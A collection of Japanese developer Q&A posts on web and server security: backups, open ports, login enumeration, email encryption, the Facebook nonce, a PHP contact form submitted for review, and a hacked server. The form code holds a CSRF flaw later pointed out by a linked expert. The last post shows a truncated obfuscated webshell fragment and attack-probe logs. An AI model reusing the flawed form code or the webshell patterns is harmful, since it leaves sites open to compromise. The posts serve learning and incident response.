常連

## バックアップ的なものはあるのか？

独学でやっています。Linuxのデータがすべて消えたりすることは基本無いですが、そういったコマンドがあることを知っています。rmコマンドを使うと元に戻すことは難しそうです。

消してしまってもすぐに元通りにできる、みんなが使っているバックアップアプリみたいのがあるのですか？教えてくれると助かります。




もしLinuxにあるデータが間違えて消えたらどうしているのですか？

リリース前にセキュリティチェックとして
ポートスキャンしたところいくつか空いているポートが見つかりました。
空いているポートに対して
実践的な対処法を教えて頂きたいです。

詳細
リリース前のnmapでポート調査してTCPポート22・80番が空いてました。
先輩に対処法を聞かれたので、教科書通りの、
・ポートを閉まる
・設定を変える
・ファイアウォールを設置する
・暗号化する
と答えましたが、
設定は今更変えられない、ファイアウォールや暗号化は違うと言われました。
リリース前でのサーバに対する実践的な対処法を教えて頂きたいです。

空いているポートの対策

WEBアプリケーションのセキュリティチェック項目の中に、

ログイン画面でアカウントの存在有無を検知されないこと
という項目がありますよね。

例えば、

- 認証に失敗したとき、アカウントの存在有無によってエラーメッセージを変えるな
- ハッシュ化されたパスワードの検証で、アカウントの存在有無によって応答時間を変えるな

とか、そういう指摘を受けることがあります。

でも、最近の大手サービスでも、アカウント名とパスワードが同じ画面にあるのではなく、まずはアカウント名を入力して次の画面でパスワードを入力させるというパターンが増えています。
![Googleサービスのログインエラー](https://ddjkaamml8q8x.cloudfront.net/questions/2023-02-13/52aae616-ea0d-4c4e-a599-bdc766d97620.png)
![Amazonのログインエラー](https://ddjkaamml8q8x.cloudfront.net/questions/2023-02-13/c0677999-bee1-47a3-8927-ed0a8cdf1835.png)

これって最初に書いた「ログイン画面でアカウントの存在有無を検知されないこと」に反していると思いますが、なぜAmazon, Google等のサービスではこのような設計が許容されているのでしょうか？


Webアプリケーションのログイン画面のセキュリティについて

よくある形態のWebメディアを開発しており、
キャンペーンやメルマガの配信にメールアドレスを収集しております。
※メールアドレスで会員登録しています

データベースに保存する際、メールアドレスを暗号化するのは一般的なのでしょうか？
上司から「メールアドレスは個人情報だから暗号化して保存しないと」と言われたのですが、
これまで上場企業のシステムなど複数携わったことがありますが、
会員登録時にメールアドレスを暗号化して保存しているシステムに出会ったことがありません。

「暗号化しないよりはした方がいい」というのは分かりますが、
複合化や検索時のデメリットを考えると「本当に暗号化する必要性はあるのだろうか？」と思ってしまいます。

私のセキュリティ感覚に問題があるのか、今回がレアケースなのか、
皆さんのご経験などを踏まえてご教授頂けますと幸いです。


メールアドレスの暗号化は必要でしょうか？

### 実現したいこと

- [ ] Facebookのページプラグインで生成されるHTMLコードにNonce属性が付与されている意味を知りたい

### 前提

Webサイト作成を行っており、Facebookページの埋め込みを検討しています。

Facebookページを埋め込むために以下のページで埋め込み用コードを取得しています。
https://developers.facebook.com/docs/plugins/page-plugin

### 質問内容
前提で記載しました埋め込み用コードの中で、
JavaScript SDKを読み込むためのscriptタグが生成されるようなのですが、このタグにnonce属性が付与されています。


nonce属性によるスクリプト実行抑制を行う場合は、
埋め込み対象のサイトのコンテンツセキュリティポリシー設定でNonceを指定している場合だと思うのですが、
生成コードで必ずnonce属性を付与しているのはなぜなのでしょうか。

付与されている理由、用途、背景など何かご存じの方がいましたらご教授願います。

### 該当のソースコード

タグ末尾のnonce属性
```HTML
<script async defer crossorigin="anonymous" src="https://connect.facebook.net/ja_JP/sdk.js#xfbml=1&version=v16.0" nonce="********">
```

Facebookのページプラグインで生成されるHTMLコードにNonce属性が付与されている意味を知りたい

## テーマ、知りたいこと

iOSアプリからPHPに情報を送る際の暗号化について

## 背景、状況

私は新たにSNSを開発しています。
その中でサーバーとの情報のやり取りでセキュリティを十分に確保する方法を探しています。

iOSではHTTPS通信が必須となっているのですが、一般的にHTTPS通信でもサーバーに送信する個人情報は暗号化すべきという意見がありました。

私の開発環境としては
クライアント→iOS
 サーバー→PHP(フレームワーク使用なし）
としており言語が違うため、この二つに共通した暗号化方式が見つからず、片方が暗号化しても複合化をすることができず困っています。

のちのちAndroidの対応も視野に入れているのでPHPを基準として、暗号化、複合化を考えた方が良いと思っているのですが、それは現実可能な考えなのでしょうか？
DBに格納された暗号化データは基本的に複合できないのが正しいセキュリティなのでしょうか？
セキュリティに関して最近学んでいるところなので拙いですが、ご意見あればよろしくお願いいたします。


iOSアプリからPHPに情報を送る際の暗号化について

PHPでメールフォームを作成したので、脆弱性がないかアドバイスいただけないでしょうか。
エンジニアでもなければ、PHPもろくに書けない雑魚ですが、「[php メールフォーム 作り方](https://www.google.co.jp/search?q=php+%E3%83%A1%E3%83%BC%E3%83%AB%E3%83%95%E3%82%A9%E3%83%BC%E3%83%A0+%E4%BD%9C%E3%82%8A%E6%96%B9&ie=utf-8&oe=utf-8&client=firefox-b-ab&gfe_rd=cr&ei=6NrkWKWOBuzZ8AfguCs)」でググって表示されるサイトを見ると、「んんんんん？？？」と思うところがあります。
これらを参考にしたり、コピペする方は、記述されているコードの良し悪しは判断できないかと思います。
そのような方々が参考にできるメールフォームを作りたいという思いで、調べて作りました。
周りに書いたコードを確認してもらえる人もいないので、皆様からのアドバイスがほしいです((_ _ (´ω｀ )ﾍﾟｺ

このメールフォームは、下記を対象者としています。

- php メールフォーム 作り方 でググってコピペする方
- コピペして動けばいいと考えている方
- if文や関数など基本的な記述はわかるけど、クラスとか理解していない方
- 脆弱性？なにそれ？という方

そのために、このメールフォームは下記の点を意識して作成しました。

- **コピペしたら動く**
- **なるべく難しい記述はしない、記述量を減らす**
- 処理を中断する die を使っていないので、表示したい箇所にコピペすれば動く
- PHP5.2.xまで想定し、環境（magic_quotes_gpc、セーフモード）に依存しない
- 肝心の脆弱性対策はクリックジャッキング、CSRF、XSS、メールヘッダインジェクションを考慮

最終的にはコード＋説明した記事を作成してQittaに投稿する予定です。
問題があれば、詳しい方々からアドバイスやご指摘があるはずなので...

**皆様から見て、脆弱性や気になる点などあれば、アドバイスもらえると嬉しいです((_ _ (´ω｀ )ﾍﾟｺ**
至らないところがあれば、調べますので、ご指摘だけでも頂けると嬉しいです。
お願いします。

入力（`index.php`） → 確認（`confirm.php`） → 送信（`send.php`） と画面を遷移してメールを送ります。

```php
<?php
// 他のサイトでインラインフレーム表示を禁止する（クリックジャッキング対策）
header('X-FRAME-OPTIONS: SAMEORIGIN');

// セッション開始
session_start();

// HTML特殊文字をエスケープする関数
function h($str) {
	return htmlspecialchars($str,ENT_QUOTES,'UTF-8');
}

/* --------------------------------------------------
	トークンの作成（CSRF対策）

	※使用しているPHPのバージョン・環境にあわせて
	 トークンを選んでね。不要なトークは削除してね。
-------------------------------------------------- */

// PHP 7.0 以降
if(!isset($_SESSION['token'])) {
	$_SESSION['token'] = bin2hex(random_bytes(32));
}

// PHP 5.3 ～ 5.x ※OPENSSL導入済
if(!isset($_SESSION['token'])) {
	$_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32));
}

// PHP 5.3 未満
if(!isset($_SESSION['token'])) {
	$_SESSION['token'] = hash('sha256', session_id());
}

// トークンを代入
$token = $_SESSION['token'];

?>
<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<title>入力画面</title>
</head>
<body>

<h1>お問い合わせ（入力画面）</h1>

<form method="post" action="confirm.php">
<table>
	<tr>
		<th>お名前（必須）</th>
		<td><input type="text" name="name"></td>
	</tr>
	<tr>
		<th>ふりがな（必須）</th>
		<td><input type="text" name="ruby"></td>
	</tr>
	<tr>
		<th>メールアドレス（必須）</th>
		<td><input type="text" name="mail"></td>
	</tr>
	<tr>
		<th>内容（必須）</th>
		<td><textarea name="content"></textarea></td>
	</tr>
</table>
<input type="hidden" name="token" value="<?php echo h($token); ?>">
<button>送信内容確認</button>
</form>
</body>
</html>
```

```php
<?php
// 他のサイトでインラインフレーム表示を禁止する（クリックジャッキング対策）
header('X-FRAME-OPTIONS: SAMEORIGIN');

// セッション開始
session_start();

// HTML特殊文字をエスケープする関数
function h($str) {
    return htmlspecialchars($str,ENT_QUOTES,'UTF-8');
}
?>
<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<title>確認画面</title>
</head>
<body>

<h1>お問い合わせ（確認画面）</h1>

<?php

// セッション変数がなければ、空文字を代入
if(!isset($_SESSION['token'])) {
    $_SESSION['token'] = '';
}

// POSTされたデータを変数に代入（magic_quotes_gpc = On ＋ NULLバイト 対策）
foreach (array('token','name','ruby','mail','content') as $v) {
    $$v = filter_input(INPUT_POST, $v, FILTER_DEFAULT, FILTER_FLAG_STRIP_LOW);
}

// トークンを確認し、確認画面を表示
if($token !== $_SESSION['token']) {

    echo '<p>お問い合わせの手順に誤りがあります。<br>お手数ですが、最初からやり直してください。</p>';

} else {

    $error_flag = 0;

    // 必須項目は未入力をチェック
    if ($name === '') {
        echo '<p>お名前をご入力してください。</p>';
        $error_flag = 1;
    } elseif (mb_strlen($name) > 50) {
        echo '<p>お名前は 50 文字以内で入力してください。</p>';
        $error_flag = 1;
    }

    if ($ruby === '') {
        echo '<p>ふりがなをご入力してください。</p>';
        $error_flag = 1;
    } elseif (mb_strlen($ruby) > 50) {
        echo '<p>ふりがなは 50 文字以内で入力してください。</p>';
        $error_flag = 1;
    }

    if ($mail === '') {
        echo '<p>メールアドレスをご入力してください。</p>';
        $error_flag = 1;
    } elseif (mb_strlen($mail) > 100) {
        echo '<p>メールアドレスは 100 文字以内で入力してください。</p>';
        $error_flag = 1;
    } elseif (!filter_var($mail, FILTER_VALIDATE_EMAIL)) {
        echo '<p>メールアドレスの形式が正しくありません。</p>';
        $error_flag = 1;
    }

    if ($content === '') {
        echo '<p>内容をご入力してください。</p>';
        $error_flag = 1;
    } elseif (mb_strlen($content) > 500) {
        echo '<p>内容は 500 文字以内で入力してください。</p>';
        $error_flag = 1;
    }

    // エラーがある場合は、戻るボタンを表示し、エラーがない場合は、確認画面を表示
    if ($error_flag === 1) {
        echo '<button onClick="history.back(); return false;">戻る</button>';
    } else {
        // セッション変数に代入
        $_SESSION['name'] = $name;
        $_SESSION['ruby'] = $ruby;
        $_SESSION['mail'] = $mail;
        $_SESSION['content'] = $content;

        // 確認用画面の表示
    ?>

        <form method="post" action="send.php">
            <table>
                <tr>
                    <th>お名前</th>
                    <td><?php echo h($name); ?></td>
                </tr>
                <tr>
                    <th>ふりがな</th>
                    <td><?php echo h($ruby); ?></td>
                </tr>
                <tr>
                    <th>メールアドレス</th>
                    <td><?php echo h($mail); ?></td>
                </tr>
                <tr>
                    <th>内容</th>
                    <td><?php echo nl2br(h($content)); ?></td>
                </tr>
            </table>
            <input type="hidden" name="token" value="<?php echo h($token); ?>">
            <button>送信</button>
        </form>

<?php
    }
}
?>
</body>
</html>
```

```php
<?php
// 他のサイトでインラインフレーム表示を禁止する（クリックジャッキング対策）
header('X-FRAME-OPTIONS: SAMEORIGIN');

// セッション開始
session_start();

// mb_send_mail のエンコーディング
mb_language('ja');

// 内部文字エンコーディングを設定
mb_internal_encoding('UTF-8');
?>
<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<title>送信画面</title>
</head>
<body>

<h1>お問い合わせ（送信画面）</h1>

<?php

// セッション変数がなければ、空文字を代入
if(!isset($_SESSION['token'])) {
    $_SESSION['token'] = '';
}

// POST['token']の値をtoken変数に代入
$token = filter_input(INPUT_POST, 'token', FILTER_DEFAULT, FILTER_FLAG_STRIP_LOW);

// 各セッション変数を各変数に代入
$name = isset($_SESSION['name']) && is_string($_SESSION['name']) ? $_SESSION['name'] : '';
$ruby = isset($_SESSION['ruby']) && is_string($_SESSION['ruby']) ? $_SESSION['ruby'] : '';
$mail = isset($_SESSION['mail']) && is_string($_SESSION['mail']) ? $_SESSION['mail'] : '';
$content = isset($_SESSION['content']) && is_string($_SESSION['content']) ? $_SESSION['content'] : '';

// トークンの値が一致しない場合は、エラー文を表示し、一致する場合は送信する
if($token !== $_SESSION['token']) {

    echo '<p>送信後に再度アクセスされたか、お問い合わせの手順に誤りがあります。<br>お手数ですが、最初の画面からご入力ください。<p>';

} else {

    /*  運営側へ送信するメールの設定  */

    // 送信先のメールアドレス
    $to      = 'xxxxxx@xxxxx.xxxx';
    // 件名
    $subject = '【お問い合わせからの送信】○○○○○○○○○○';
    // 本文
    $message = "◆お名前\n$name\n\n◆フリガナ\n$ruby\n\n◆メールアドレス\n$mail\n\n◆内容\n$content";
    // オプション
    $option = '-f'. $to;


    /*  問い合わせされた方へ自動返信するメールの設定  */

    // 件名
    $auto_subject = '【お問い合わせ】○○○○○○○○○○';
    // 送信元のメールアドレス
    $auto_from    = 'From:' . $to;
    // 本文
    $auto_message = "
※このメールは自動返信によるものです。

$name 様

このたびは、お問合せいただき、誠にありがとうございました。

お送りいただきました内容を確認の上、担当者より折り返しご連絡させていただきます。
    ";

    /* セーフモードがONの場合は、mb_send_mailの第5引数が使えないため、処理を分岐して送信 */
    if(ini_get('safe_mode')) {

        /*  運営側と自動返信のメールの送信が完了したら、送信完了の文章を表示する  */
        if(mb_send_mail($to, $subject, $message, "From:$mail") && mb_send_mail($mail, $auto_subject, $auto_message, $auto_from)) {
            echo '<p>このたびは、お問合せいただき、誠にありがとうございました。<br>お送りいただきました内容を確認の上、担当者より折り返しご連絡させていただきます。</p>';
        } else {
            echo '<p>大変申し訳ございませんが、メールの送信に失敗しました。<br>お手数ですが最初からやり直してください。</p>';
        }

    } else {

        /*  運営側と自動返信のメールの送信が完了したら、送信完了の文章を表示する  */
        if(mb_send_mail($to, $subject, $message, "From:$mail", $option) && mb_send_mail($mail, $auto_subject, $auto_message, $auto_from, $option)) {
            echo '<p>このたびは、お問合せいただき、誠にありがとうございました。<br>お送りいただきました内容を確認の上、担当者より折り返しご連絡させていただきます。</p>';
        } else {
            echo '<p>大変申し訳ございませんが、メールの送信に失敗しました。<br>お手数ですが最初からやり直してください。</p>';
        }

    }

}

// セッションの破棄
$_SESSION = array();
session_destroy();

?>
</body>
</html>
```

## **2017.04.11 追記**

徳丸氏による、脆弱性の解説です。

- [teratailに投稿されたメールフォームにCSRF脆弱性が残存した理由 | 徳丸浩の日記](http://blog.tokumaru.org/2017/04/teratailcsrf.html)

ありがとうございます((_ _ (´ω｀ )ﾍﾟｺ

【PHP】作成したメールフォームに脆弱性がないか、アドバイスもらえないでしょうか。

### 前提
レンタルサーバーに、ある会社のために作ったサイトに、外部の人からphpプログラム（マルウェア）を書き込まれました。そのプログラムを実行するとサーバーのIDとパスワードを知らなくても、ファイルマネージャーとして動きます。
それを実行したと思われるのですが、サイトの中のフォルダやファイルが全て消されてしまいました。

### 実現したいこと

- [ ] 外部からサーバーに勝手に書き込む手法としてどのようなことが考えられるのかを知りたいです。
- [ ]  サーバーに書き込むことを防ぐ方法にどのようなことが考えられるのかを知りたいです。

### 発生している問題・エラーメッセージ

```
サイトのファイルが全部消されてしまった。
```

### 該当のソースコード

```php
<?php /* tjwlltii akhmhcij */error_reporting(0);ini_set("display_errors", 0);if(!defined('lmhelqpg')){define('lmhelqpg',__FILE__);if(!function_exists("斐ﾗｩｧ壟ﾅ")){function ﾈ埣・ﾌｳﾗ($ﾒｭﾚ懌榴){global$ｼ堋棕ﾎ,$ﾑ釟ｹ
```
書き込まれたPHPプログラムの一部だけを表示します。
もし、これの全部が必要な方は連絡をください。

### 試したこと

これまで行っていたセキュリティ対策
・WAFの導入（検出ログは、問題の発生日には何もありませんでした）
・国外IPアドレスからのアクセスは制限してあります
・サーバーログイン履歴には問題の発生日にはログインはありませんでした。

### 補足情報（FW/ツールのバージョンなど）
アクセスログです。（「自分.com」が実際のドメイン名になります）
zzeiajc.phpが書き込まれたプログラムです。
> 自分.com 14.3.114.129 - - [03/Aug/2022:11:06:39 +0900] "GET / HTTP/1.1" 200 1632 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
> 自分.com 103.214.141.162 - - [03/Aug/2022:12:11:07 +0900] "GET /**zzeiajc.php** HTTP/1.1" 200 315205 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36"
> 自分.com 103.214.141.162 - - [03/Aug/2022:12:36:31 +0900] "POST /zzeiajc.php HTTP/1.1" 200 29284 "https://自分.com/zzeiajc.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36"
> 自分.com 103.214.141.162 - - [03/Aug/2022:12:36:35 +0900] "POST /zzeiajc.php HTTP/1.1" 200 46047 "https://自分.com/zzeiajc.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36"
> 自分.com jobqueue-listener.jobqueue.netcraft.com-ub52906ae128411ed83c1d26e838d6ab1u-digitalocean-2gb - - [03/Aug/2022:13:05:19 +0900] "GET / HTTP/1.1" 200 1632 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
> 自分.com 93.89.114.58.ip.vitnett.no - - [03/Aug/2022:14:56:30 +0900] "GET / HTTP/1.1" 200 1632 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2638.56 Safari/537.36"
> 自分.com 14.3.114.129 - - [03/Aug/2022:15:30:24 +0900] "GET /finish.php HTTP/1.1" 200 - "https://自分.com/roumuka_menu.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
> 自分.com 14.3.114.129 - - [03/Aug/2022:15:30:25 +0900] "GET / HTTP/1.1" 200 1632 "https://自分.com/finish.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
> 自分.com 14.3.114.129 - - [03/Aug/2022:15:39:46 +0900] "GET /zzeiajc.php HTTP/1.1" 200 315202 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
> 自分.com 14.3.114.129 - - [03/Aug/2022:15:47:34 +0900] "POST /zzeiajc.php HTTP/1.1" 200 14641 "https://自分.com/zzeiajc.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
> 自分.com 14.3.114.129 - - [03/Aug/2022:15:47:34 +0900] "POST /zzeiajc.php HTTP/1.1" 200 57669 "https://自分.com/zzeiajc.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
> 自分.sakura.ne.jp cache.google.com - - [03/Aug/2022:16:44:21 +0900] "GET / HTTP/1.1" 200 1632 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
> 自分.sakura.ne.jp 210.158.146.102 - - [03/Aug/2022:16:44:22 +0900] "GET /style.css HTTP/1.1" 200 12155 "http://自分.sakura.ne.jp/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
> 自分.com 205.210.31.143 - - [03/Aug/2022:17:11:40 +0900] "GET / HTTP/1.1" 200 1632 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

エラーログです。
> [Wed Aug 03 11:15:18.425442 2022] [suexec:notice] [pid 93796] AH01232: suEXEC mechanism enabled (wrapper: /usr/local/apache/bin/suexec)
> [Wed Aug 03 11:15:18.456320 2022] [ssl:warn] [pid 93796] AH01916: Init: (自分.com:443) You configured HTTP(80) on the standard HTTPS(443) port!
> [Wed Aug 03 11:15:18.934010 2022] [ssl:warn] [pid 93840] AH01873: Init: Session Cache is not configured [hint: SSLSessionCache]
> [Wed Aug 03 11:15:18.934042 2022] [ssl:warn] [pid 93840] AH01916: Init: (自分.com:443) You configured HTTP(80) on the standard HTTPS(443) port!
> [Wed Aug 03 11:15:18.950120 2022] [mpm_prefork:notice] [pid 93840] AH00163: Apache/2.4.54 (Unix) OpenSSL/1.0.2o configured -- resuming normal operations
> [Wed Aug 03 11:15:18.957992 2022] [core:notice] [pid 93840] AH00094: Command line: '/usr/local/apache/bin/httpd -f /home/config/users/自分/http/user-httpd.conf'
> [Wed Aug 03 11:15:37.942552 2022] [suexec:notice] [pid 94751] AH01232: suEXEC mechanism enabled (wrapper: /usr/local/apache/bin/suexec)
> [Wed Aug 03 11:15:37.946613 2022] [ssl:warn] [pid 94751] AH01916: Init: (自分.com:443) You configured HTTP(80) on the standard HTTPS(443) port!
> [Wed Aug 03 11:15:38.130890 2022] [ssl:warn] [pid 94795] AH01873: Init: Session Cache is not configured [hint: SSLSessionCache]
> [Wed Aug 03 11:15:38.130926 2022] [ssl:warn] [pid 94795] AH01916: Init: (自分.com:443) You configured HTTP(80) on the standard HTTPS(443) port!
> [Wed Aug 03 11:15:38.142154 2022] [mpm_prefork:notice] [pid 94795] AH00163: Apache/2.4.54 (Unix) OpenSSL/1.0.2o configured -- resuming normal operations
> [Wed Aug 03 11:15:38.142208 2022] [core:notice] [pid 94795] AH00094: Command line: '/usr/local/apache/bin/httpd -f /home/config/users/自分/http/user-httpd.conf'
> [Wed Aug 03 12:27:12.800870 2022] [cgi:error] [pid 95497] [client 159.203.5.240:0] AH02811: script not found or unable to stat: /home/自分/www/windex.php
> [Wed Aug 03 12:27:57.337118 2022] [cgi:error] [pid 42309] [client 159.203.5.240:0] AH02811: script not found or unable to stat: /home/自分/www/wp-blockdown.php
> [Wed Aug 03 12:27:58.521511 2022] [cgi:error] [pid 42309] [client 159.203.5.240:0] AH02811: script not found or unable to stat: /home/自分/www/wpecho.php
> [Wed Aug 03 12:27:59.650311 2022] [cgi:error] [pid 94817] [client 159.203.5.240:0] AH02811: script not found or unable to stat: /home/自分/www/d2.php
> [Wed Aug 03 12:28:00.875537 2022] [cgi:error] [pid 95497] [client 159.203.5.240:0] AH02811: script not found or unable to stat: /home/自分/www/infodat.php
> [Wed Aug 03 12:28:02.038647 2022] [cgi:error] [pid 42309] [client 159.203.5.240:0] AH02811: script not found or unable to stat: /home/自分/www/webdata.php
> [Wed Aug 03 12:28:03.114980 2022] [cgi:error] [pid 95497] [client 159.203.5.240:0] AH02811: script not found or unable to stat: /home/自分/www/local.php
> [Wed Aug 03 12:28:04.114466 2022] [cgi:error] [pid 42309] [client 159.203.5.240:0] AH02811: script not found or unable to stat: /home/自分/www/web.php
> [Wed Aug 03 14:56:31.049684 2022] [cgi:error] [pid 42309] [client 93.89.114.58:0] AH02811: script not found or unable to stat: /home/自分/www/style.php, referer: http://自分.com/
> [Wed Aug 03 14:56:31.593957 2022] [cgi:error] [pid 42309] [client 93.89.114.58:0] AH02811: script not found or unable to stat: /home/自分/www/style.php, referer: http://自分.com/style.php?sig=shell519&file_name=accesson.php&domain=46osago.ru&shell_file=accesson20
> [Wed Aug 03 14:56:32.774727 2022] [cgi:error] [pid 42309] [client 93.89.114.58:0] AH02811: script not found or unable to stat: /home/自分/www/accesson.php, referer: http://自分.com/style.php?sig=beima&domain=46osago.ru&shell_file=accesson20&file_name=accesson.php
> [Wed Aug 03 15:40:18.792217 2022] [cgi:error] [pid 42309] [client 14.3.114.129:0] AH02811: script not found or unable to stat: /home/自分/www/z9pvs.php
> [Wed Aug 03 15:46:58.056361 2022] [cgi:error] [pid 95497] [client 14.3.114.129:0] AH02811: script not found or unable to stat: /home/自分/www/z9pvs.php
> 引用テキスト



セキュリティー